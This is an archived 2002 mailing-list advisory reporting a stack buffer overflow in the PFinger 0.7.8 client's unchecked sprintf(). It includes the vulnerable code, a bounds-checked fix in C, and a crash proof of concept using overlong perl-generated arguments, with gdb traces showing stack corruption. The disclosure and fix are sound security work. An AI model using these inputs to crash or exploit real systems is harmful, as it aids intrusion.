PFinger Buffer Overflow Vulnerability.

From: dong-h0un U (xploitat_private)
Date: Tue Jun 04 2002 - 08:14:54 PDT


     PFinger Buffer Overflow Vulnerability.
    
    
     * Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)
    
     * Overview:
    
     The pfinger client contains a stack-based buffer overflow (an array
     bounds overflow). The bug was found in the client; I have not checked
     whether the server side is vulnerable as well.

     Similar bugs of various kinds may exist elsewhere anyway. :-(
    
     * Description:
    
     The overflow occurs in the 100-byte array "query" (char query[100]),
     which is filled from the command-line argument. The same result is
     produced with the -l, -d and -t options. The cause is an unchecked
     call to sprintf() into that array (finger.c, line 144).
    
     === pfinger-0.7.8/src/finger.c =================================
    
     :
     :
     int main( int   argc, char *argv[] )
     {
      int flag;
      char *progname;
      int info = 0;
      char *hostname;
      char query[100];                   /* fixed 100-byte stack buffer */
      :
      :
      /* argv[optind] is copied without any length check, followed by "\r\n" and the NUL */
      sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
                      ~~~~~~~~
      DoFinger1(hostname, query);
      optind++;
     }  
     :
     :
    
     ================================================================
     
     After the call the stack holds the query as follows:

     query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];

     Note that sprintf() appends "\r\n" and a terminating NUL, so a 97-byte
     argument (94 bytes when the three-byte "/W_" prefix is added) already
     fills the buffer; anything longer overruns it and overwrites whatever
     follows on the stack.
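     As an added example (not pfinger's own code), here is how the sprintf() call could be replaced with an explicit length check that rejects over-long arguments instead of overrunning or silently truncating the query. The names QUERY_SIZE, INFO_PREFIX, query_fits, build_query and build_query_static are this example's own; the 100-byte size mirrors query[100] from the excerpt above, and the "/W_" prefix mirrors the info flag. Built stand-alone it shows that 97 bytes (94 with the prefix) is the longest argument that fits.

```c
/*
 * Added example, not code from pfinger: bounds-checked construction of the
 * finger query that finger.c builds with an unchecked sprintf().
 * All names here are this example's own; QUERY_SIZE mirrors char query[100].
 */
#include <stdio.h>
#include <string.h>

#define QUERY_SIZE  100      /* same size as char query[100] in finger.c   */
#define INFO_PREFIX "/W_"    /* prefix added when the "info" flag is set    */
#define CRLF_LEN    2        /* the trailing "\r\n"                          */

/* Return 1 if a user argument of user_len bytes fits in QUERY_SIZE together
 * with the optional prefix, the CRLF and the terminating NUL, else 0. */
int query_fits(int info, size_t user_len)
{
    size_t prefix_len = info ? strlen(INFO_PREFIX) : 0;
    return prefix_len + user_len + CRLF_LEN + 1 <= QUERY_SIZE;
}

/* Build the query into a caller-supplied buffer of outsz bytes.
 * Returns the number of bytes written (excluding the NUL), or -1 if the
 * argument does not fit; in that case out is set to "" rather than truncated,
 * so a mangled user name is never sent to the server. */
int build_query(char *out, size_t outsz, int info, const char *user)
{
    const char *prefix = info ? INFO_PREFIX : "";
    size_t need = strlen(prefix) + strlen(user) + CRLF_LEN + 1;
    int n;

    if (outsz == 0)
        return -1;
    if (need > outsz) {
        out[0] = '\0';
        return -1;
    }
    /* snprintf() cannot overrun outsz, and the check above proves it fits. */
    n = snprintf(out, outsz, "%s%s\r\n", prefix, user);
    return n;
}

/* Convenience wrapper using a static QUERY_SIZE buffer, mirroring the local
 * array in main(). Returns NULL when the argument is rejected. */
const char *build_query_static(int info, const char *user)
{
    static char query[QUERY_SIZE];
    return build_query(query, sizeof query, info, user) < 0 ? NULL : query;
}

/* Usage: ./safe_query [-l] <user>   (constructed demo, no network I/O) */
int main(int argc, char *argv[])
{
    int info = 0, i = 1;
    const char *user, *q;

    if (i < argc && strcmp(argv[i], "-l") == 0) {
        info = 1;
        i++;
    }
    user = (i < argc) ? argv[i] : "x82";   /* default name is constructed */
    q = build_query_static(info, user);
    if (q == NULL) {
        size_t max = QUERY_SIZE - CRLF_LEN - 1 - (info ? strlen(INFO_PREFIX) : 0);
        fprintf(stderr, "finger: argument too long (max %zu bytes)\n", max);
        return 1;
    }
    printf("query (%zu bytes): %s", strlen(q), q);
    return 0;
}
```

     Rejecting rather than truncating is deliberate: a truncated name would still be sent to the remote fingerd and could be mistaken for a valid lookup, whereas an error tells the user exactly why the request was refused.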
    
     * Proof of concept:
    
     [x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ gcc -v
     Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
     gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) 
     [x82@xpl017elz src]$
    
     - Debugging -
    
     [x82@xpl017elz src]$ gdb -q ./finger
     (gdb) r -l `perl -e 'print "x"x100'`
     Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
     x"x100'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     
     Program received signal SIGSEGV, Segmentation fault.
     0x4005000a in _ufc_foobar () from /lib/libc.so.6
     (gdb) r -l `perl -e 'print "x"x101'`
     
     Program received signal SIGSEGV, Segmentation fault.
     0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
     (gdb) r -l `perl -e 'print "x"x102'`
     
     Program received signal SIGSEGV, Segmentation fault.
     0xa0d78 in ?? ()
     (gdb)
    
     (gdb) r -l `perl -e 'print "x"x105'`
     Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
     x"x105'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     
     Program received signal SIGSEGV, Segmentation fault.
     0x400a4b53 in strrchr () from /lib/libc.so.6
     (gdb) where
     #0  0x400a4b53 in strrchr () from /lib/libc.so.6
     #1  0xbffff564 in ?? ()
     #2  0x78787878 in ?? ()
     Cannot access memory at address 0x78787878.
     (gdb)    
    
     P.S: Sorry for my poor English.
    
     __
     By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
     E-mail: szoahcat_private
     Home: http://x82.i21c.net
    
    
    



    This archive was generated by hypermail 2b30 : Tue Jun 04 2002 - 10:24:33 PDT